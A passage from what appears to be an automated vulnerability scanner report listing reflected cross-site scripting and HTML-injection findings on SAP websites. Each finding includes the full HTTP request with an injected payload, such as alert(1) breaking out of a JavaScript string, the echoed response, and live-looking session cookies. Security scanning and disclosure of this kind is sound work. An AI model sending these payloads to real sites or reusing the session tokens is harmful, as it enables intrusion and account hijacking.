<html><head><script type='text/JavaScript'>parent.saml_login_no_sso_callback('<?xml version="1.0" encoding="utf-16"?><IdentityInfoBE xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.
...[SNIP]...
<LoginPassword>xssf2fdb';alert(1)//cf53a137865</LoginPassword>
...[SNIP]...

1.142. https://www.sap.com/profile/samlrequest.epx [userid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.sap.com
Path:   /profile/samlrequest.epx

Issue detail

The value of the userid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e1332'-alert(1)-'f09779bee1c was submitted in the userid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

POST /profile/samlrequest.epx HTTP/1.1
Host: www.sap.com
Connection: keep-alive
Content-Length: 23
Cache-Control: max-age=0
Origin: https://www.sap.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.sap.com/profile/slogin.epx?pmelayer=true&kNtBzmUK9zU=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; a1slocale=en; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; nwt=wetnow; ARPT=ONKKMMS169.145.6.59CKMMW; session=52383e4a-d615-4153-a2b4-311fe768b4c7; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; NPC_CPS_SESSION=xxxxxx; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fstore.businessobjects.com%2fstore%2fbobjects%2fContent%2fpbPage.sap_countryselector%3fresid%3dTmOIUAoBAlUAAARDMJwAAAAN%26rests%3d1321211061712; mbox=session#1321210845752-117832#1321212928|check#true#1321211128; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|INDUSTRY=INDA000011,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|; 37021986-VID=5110247826455; 37021986-SKEY=8052586457831773007; HumanClickSiteContainerID_37021986=STANDALONE; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493

userid=xsse1332'-alert(1)-'f09779bee1c&password=xss

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:08:50 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:08:50 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:08:51 GMT
Content-Length: 562

<html><head><script type='text/JavaScript'>parent.saml_login_no_sso_callback('<?xml version="1.0" encoding="utf-16"?><IdentityInfoBE xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.
...[SNIP]...
<LoginAccount>xsse1332'-alert(1)-'f09779bee1c</LoginAccount>
...[SNIP]...

1.143. http://www.sdn.sap.com/irj/scn/about [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sdn.sap.com
Path:   /irj/scn/about

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d19a"><a>80170f92216 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /irj/scn/about?6d19a"><a>80170f92216=1 HTTP/1.1
Host: www.sdn.sap.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: VisitID=QUMxMDY0MUUtMTMzOUYzNEExN0YtN0UyMzYyQzhFMzFGMDk1Nw==; saplb_*=(J2EE3417500)3417550; Unique=QUMxMDY0MUUtMTMzOUYzNEExN0UtMUVFRjVDODZCMzlBNDg2MA==; PortalAlias=scn; JSESSIONID=(J2EE3417500)ID0470980050DB00562634514529980956End; SDNSTATE=509874348.14340.0000

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MUUtMTMzOUYzNEExN0UtMUVFRjVDODZCMzlBNDg2MA==
SDN_VISIT: QUMxMDY0MUUtMTMzOUYzNTAyNDAtRjI3M0E1MTZGRDYyNTRDQQ==
SDN_RES_KEY: /webcontent/uuid/a89be75d-0501-0010-eb91-8b2638a2dde6
Expires: 0
Content-Length: 49406
Vary: Accept-Encoding
Date: Sun, 13 Nov 2011 23:17:16 GMT
Connection: close
Set-Cookie: PortalAlias=scn; Path=/
Set-Cookie: PortalAlias=scn; Path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
<a href="/irj/scn/logon?redirect=/irj/scn/about?6d19a"><a>80170f92216=1">
...[SNIP]...

1.144. http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/302058d8-e311-2a10-7bb8-da3fb36217c4 [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sdn.sap.com
Path:   /irj/scn/go/portal/prtroot/docs/library/uuid/302058d8-e311-2a10-7bb8-da3fb36217c4

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39fb5"><a%20b%3dc>8171187bc32 was submitted in the REST URL parameter 7. This input was echoed as 39fb5"><a b=c>8171187bc32 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /irj/scn/go/portal/prtroot/docs/library39fb5"><a%20b%3dc>8171187bc32/uuid/302058d8-e311-2a10-7bb8-da3fb36217c4?QuickLink=index&overridelayout=true HTTP/1.1
Host: www.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=10&ved=0CGkQFjAJ&url=http%3A%2F%2Fwww.sdn.sap.com%2Firj%2Fscn%2Findex%3Frid%3D%2Flibrary%2Fuuid%2F302058d8-e311-2a10-7bb8-da3fb36217c4%26overridelayout%3Dtrue&ei=2B3ATpv9N5PSiAL9tLyyAw&usg=AFQjCNE-gRJdHKGWnev9t7kIzwO9f-eyIQ
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VisitID=QUMxMDY0MUEtMTMzOUU3M0U2MTQtNTUzREU1QjlGRDc5MkNGOQ==; Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; session=52383e4a-d615-4153-a2b4-311fe768b4c7; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; NPC_CPS_SESSION=xxxxxx; ecomssid=9e058b05fca36645a7e1ab7412f0a6ac; UsersDefaultCountry=US; UsersDefaultLanguage=EN; ecomguid=e3bb7cf5-0f27-0664-0d80-59dcb5447048; SingleSignOnEvent=51a3d747-8c02-417d-8f96-ae6e0ddd405d|TrainingCertification; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-QUERYSTRINGFIELD=; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2ftraining-certification%2fregister.epx%3fkNtBzmUK9zU; SAP.SITE.COOKIE=cmpgn.code=CRM-AP09-IND-SRMQ2ANZ&cmpn=CRM-AP09-IND-SRMQ2ANZ; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=True&InquiryType=Campaign&InquiryLevel=Premium&Segment=LE; saplb_*=(J2EE3417100)3417150; JSESSIONID=(J2EE3417100)ID0344110250DB00531600921827091440End; SDNSTATE=442765484.14340.0000; client=6ed3d8c3-34dc-b9f4-1124-005f785589fd; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fforums.sdn.sap.com%2fthread.jspa%3fthreadID%3d2072047; SAP_SCORING_COOKIE=SOLUTION=BARB001001,9|SOLUTION=BARB003001,9|INDUSTRY=INDA000011,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Aforums%7C1321215223911%3B%20pe%3Dno%2520value%7C1321215223916%3B%20c3%3Dno%2520value%7C1321215223919%3B%20s_nr%3D1321213423931-Returning%7C1323805423931%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1450813423934%3B%20s_visit%3D1%7C1321215223936%3B%20gpv_p47%3Dno%2520value%7C1321215223940%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D2%3B%20s_sq%3D%3B; PortalAlias=scn

Response

HTTP/1.1 404 Not Found
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MUEtMTMzOUU3NUQzNTAtNDYzQUExNkZFRDA1NzhDNw==
Expires: 0
Content-Length: 26542
Date: Sun, 13 Nov 2011 19:50:56 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
<a class="sdnButton" href="/irj/scn/logon?redirect=/irj/scn/go/portal/prtroot/docs/library39fb5"><a b=c>8171187bc32/uuid/302058d8-e311-2a10-7bb8-da3fb36217c4?QuickLink=index&overridelayout=true">
...[SNIP]...

1.145. http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/302058d8-e311-2a10-7bb8-da3fb36217c4 [REST URL parameter 8]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sdn.sap.com
Path:   /irj/scn/go/portal/prtroot/docs/library/uuid/302058d8-e311-2a10-7bb8-da3fb36217c4

Issue detail

The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a58c"><a%20b%3dc>958ec24ec72 was submitted in the REST URL parameter 8. This input was echoed as 9a58c"><a b=c>958ec24ec72 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /irj/scn/go/portal/prtroot/docs/library/uuid9a58c"><a%20b%3dc>958ec24ec72/302058d8-e311-2a10-7bb8-da3fb36217c4?QuickLink=index&overridelayout=true HTTP/1.1
Host: www.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=10&ved=0CGkQFjAJ&url=http%3A%2F%2Fwww.sdn.sap.com%2Firj%2Fscn%2Findex%3Frid%3D%2Flibrary%2Fuuid%2F302058d8-e311-2a10-7bb8-da3fb36217c4%26overridelayout%3Dtrue&ei=2B3ATpv9N5PSiAL9tLyyAw&usg=AFQjCNE-gRJdHKGWnev9t7kIzwO9f-eyIQ
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VisitID=QUMxMDY0MUEtMTMzOUU3M0U2MTQtNTUzREU1QjlGRDc5MkNGOQ==; Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; session=52383e4a-d615-4153-a2b4-311fe768b4c7; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; NPC_CPS_SESSION=xxxxxx; ecomssid=9e058b05fca36645a7e1ab7412f0a6ac; UsersDefaultCountry=US; UsersDefaultLanguage=EN; ecomguid=e3bb7cf5-0f27-0664-0d80-59dcb5447048; SingleSignOnEvent=51a3d747-8c02-417d-8f96-ae6e0ddd405d|TrainingCertification; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-QUERYSTRINGFIELD=; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2ftraining-certification%2fregister.epx%3fkNtBzmUK9zU; SAP.SITE.COOKIE=cmpgn.code=CRM-AP09-IND-SRMQ2ANZ&cmpn=CRM-AP09-IND-SRMQ2ANZ; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=True&InquiryType=Campaign&InquiryLevel=Premium&Segment=LE; saplb_*=(J2EE3417100)3417150; JSESSIONID=(J2EE3417100)ID0344110250DB00531600921827091440End; SDNSTATE=442765484.14340.0000; client=6ed3d8c3-34dc-b9f4-1124-005f785589fd; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fforums.sdn.sap.com%2fthread.jspa%3fthreadID%3d2072047; SAP_SCORING_COOKIE=SOLUTION=BARB001001,9|SOLUTION=BARB003001,9|INDUSTRY=INDA000011,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Aforums%7C1321215223911%3B%20pe%3Dno%2520value%7C1321215223916%3B%20c3%3Dno%2520value%7C1321215223919%3B%20s_nr%3D1321213423931-Returning%7C1323805423931%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1450813423934%3B%20s_visit%3D1%7C1321215223936%3B%20gpv_p47%3Dno%2520value%7C1321215223940%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D2%3B%20s_sq%3D%3B; PortalAlias=scn

Response

HTTP/1.1 404 Not Found
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MUEtMTMzOUU3NUQzNTAtNDYzQUExNkZFRDA1NzhDNw==
Expires: 0
Content-Length: 29809
Vary: Accept-Encoding
Date: Sun, 13 Nov 2011 19:51:04 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
<a class="sdnButton" href="/irj/scn/logon?redirect=/irj/scn/go/portal/prtroot/docs/library/uuid9a58c"><a b=c>958ec24ec72/302058d8-e311-2a10-7bb8-da3fb36217c4?QuickLink=index&overridelayout=true">
...[SNIP]...

1.146. http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/302058d8-e311-2a10-7bb8-da3fb36217c4 [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sdn.sap.com
Path:   /irj/scn/go/portal/prtroot/docs/library/uuid/302058d8-e311-2a10-7bb8-da3fb36217c4

Issue detail

The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6de3"><a%20b%3dc>04ea5cf79f2 was submitted in the REST URL parameter 9. This input was echoed as d6de3"><a b=c>04ea5cf79f2 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /irj/scn/go/portal/prtroot/docs/library/uuid/302058d8-e311-2a10-7bb8-da3fb36217c4d6de3"><a%20b%3dc>04ea5cf79f2?QuickLink=index&overridelayout=true HTTP/1.1
Host: www.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=10&ved=0CGkQFjAJ&url=http%3A%2F%2Fwww.sdn.sap.com%2Firj%2Fscn%2Findex%3Frid%3D%2Flibrary%2Fuuid%2F302058d8-e311-2a10-7bb8-da3fb36217c4%26overridelayout%3Dtrue&ei=2B3ATpv9N5PSiAL9tLyyAw&usg=AFQjCNE-gRJdHKGWnev9t7kIzwO9f-eyIQ
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VisitID=QUMxMDY0MUEtMTMzOUU3M0U2MTQtNTUzREU1QjlGRDc5MkNGOQ==; Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; session=52383e4a-d615-4153-a2b4-311fe768b4c7; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; NPC_CPS_SESSION=xxxxxx; ecomssid=9e058b05fca36645a7e1ab7412f0a6ac; UsersDefaultCountry=US; UsersDefaultLanguage=EN; ecomguid=e3bb7cf5-0f27-0664-0d80-59dcb5447048; SingleSignOnEvent=51a3d747-8c02-417d-8f96-ae6e0ddd405d|TrainingCertification; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-QUERYSTRINGFIELD=; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2ftraining-certification%2fregister.epx%3fkNtBzmUK9zU; SAP.SITE.COOKIE=cmpgn.code=CRM-AP09-IND-SRMQ2ANZ&cmpn=CRM-AP09-IND-SRMQ2ANZ; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=True&InquiryType=Campaign&InquiryLevel=Premium&Segment=LE; saplb_*=(J2EE3417100)3417150; JSESSIONID=(J2EE3417100)ID0344110250DB00531600921827091440End; SDNSTATE=442765484.14340.0000; client=6ed3d8c3-34dc-b9f4-1124-005f785589fd; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fforums.sdn.sap.com%2fthread.jspa%3fthreadID%3d2072047; SAP_SCORING_COOKIE=SOLUTION=BARB001001,9|SOLUTION=BARB003001,9|INDUSTRY=INDA000011,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Aforums%7C1321215223911%3B%20pe%3Dno%2520value%7C1321215223916%3B%20c3%3Dno%2520value%7C1321215223919%3B%20s_nr%3D1321213423931-Returning%7C1323805423931%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1450813423934%3B%20s_visit%3D1%7C1321215223936%3B%20gpv_p47%3Dno%2520value%7C1321215223940%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D2%3B%20s_sq%3D%3B; PortalAlias=scn

Response

HTTP/1.1 404 Not Found
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MUEtMTMzOUU3NUQzNTAtNDYzQUExNkZFRDA1NzhDNw==
Expires: 0
Content-Length: 26473
Vary: Accept-Encoding
Date: Sun, 13 Nov 2011 19:51:12 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
<a class="sdnButton" href="/irj/scn/logon?redirect=/irj/scn/go/portal/prtroot/docs/library/uuid/302058d8-e311-2a10-7bb8-da3fb36217c4d6de3"><a b=c>04ea5cf79f2?QuickLink=index&overridelayout=true">
...[SNIP]...

1.147. http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/302058d8-e311-2a10-7bb8-da3fb36217c4 [overridelayout parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sdn.sap.com
Path:   /irj/scn/go/portal/prtroot/docs/library/uuid/302058d8-e311-2a10-7bb8-da3fb36217c4

Issue detail

The value of the overridelayout request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5efbd"><a>657bf3b1c69 was submitted in the overridelayout parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /irj/scn/go/portal/prtroot/docs/library/uuid/302058d8-e311-2a10-7bb8-da3fb36217c4?QuickLink=index&overridelayout=true5efbd"><a>657bf3b1c69 HTTP/1.1
Host: www.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=10&ved=0CGkQFjAJ&url=http%3A%2F%2Fwww.sdn.sap.com%2Firj%2Fscn%2Findex%3Frid%3D%2Flibrary%2Fuuid%2F302058d8-e311-2a10-7bb8-da3fb36217c4%26overridelayout%3Dtrue&ei=2B3ATpv9N5PSiAL9tLyyAw&usg=AFQjCNE-gRJdHKGWnev9t7kIzwO9f-eyIQ
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VisitID=QUMxMDY0MUEtMTMzOUU3M0U2MTQtNTUzREU1QjlGRDc5MkNGOQ==; Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; session=52383e4a-d615-4153-a2b4-311fe768b4c7; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; NPC_CPS_SESSION=xxxxxx; ecomssid=9e058b05fca36645a7e1ab7412f0a6ac; UsersDefaultCountry=US; UsersDefaultLanguage=EN; ecomguid=e3bb7cf5-0f27-0664-0d80-59dcb5447048; SingleSignOnEvent=51a3d747-8c02-417d-8f96-ae6e0ddd405d|TrainingCertification; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-QUERYSTRINGFIELD=; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2ftraining-certification%2fregister.epx%3fkNtBzmUK9zU; SAP.SITE.COOKIE=cmpgn.code=CRM-AP09-IND-SRMQ2ANZ&cmpn=CRM-AP09-IND-SRMQ2ANZ; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=True&InquiryType=Campaign&InquiryLevel=Premium&Segment=LE; saplb_*=(J2EE3417100)3417150; JSESSIONID=(J2EE3417100)ID0344110250DB00531600921827091440End; SDNSTATE=442765484.14340.0000; client=6ed3d8c3-34dc-b9f4-1124-005f785589fd; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fforums.sdn.sap.com%2fthread.jspa%3fthreadID%3d2072047; SAP_SCORING_COOKIE=SOLUTION=BARB001001,9|SOLUTION=BARB003001,9|INDUSTRY=INDA000011,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Aforums%7C1321215223911%3B%20pe%3Dno%2520value%7C1321215223916%3B%20c3%3Dno%2520value%7C1321215223919%3B%20s_nr%3D1321213423931-Returning%7C1323805423931%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1450813423934%3B%20s_visit%3D1%7C1321215223936%3B%20gpv_p47%3Dno%2520value%7C1321215223940%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D2%3B%20s_sq%3D%3B; PortalAlias=scn

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MUEtMTMzOUU3NUQzNTAtNDYzQUExNkZFRDA1NzhDNw==
SDN_RES_KEY: /library/uuid/302058d8-e311-2a10-7bb8-da3fb36217c4
Expires: 0
Content-Length: 37310
Vary: Accept-Encoding
Date: Sun, 13 Nov 2011 19:50:03 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
<a href="/irj/scn/logon?redirect=/irj/scn/go/portal/prtroot/docs/library/uuid/302058d8-e311-2a10-7bb8-da3fb36217c4?QuickLink=index&overridelayout=true5efbd"><a>657bf3b1c69">
...[SNIP]...

1.148. http://www.sdn.sap.com/irj/scn/index [overridelayout parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sdn.sap.com
Path:   /irj/scn/index

Issue detail

The value of the overridelayout request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be526"><a>f01ad06b3c6 was submitted in the overridelayout parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /irj/scn/index?rid=/library/uuid/302058d8-e311-2a10-7bb8-da3fb36217c4&overridelayout=truebe526"><a>f01ad06b3c6 HTTP/1.1
Host: www.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=10&ved=0CGkQFjAJ&url=http%3A%2F%2Fwww.sdn.sap.com%2Firj%2Fscn%2Findex%3Frid%3D%2Flibrary%2Fuuid%2F302058d8-e311-2a10-7bb8-da3fb36217c4%26overridelayout%3Dtrue&ei=2B3ATpv9N5PSiAL9tLyyAw&usg=AFQjCNE-gRJdHKGWnev9t7kIzwO9f-eyIQ
